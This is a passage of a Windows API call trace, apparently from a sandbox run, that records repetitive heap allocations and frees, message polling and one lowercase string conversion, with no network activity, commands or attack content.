hHeap=0x8a0000) returned 1 [0178.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.552] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0178.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0178.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.556] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.556] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.557] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | 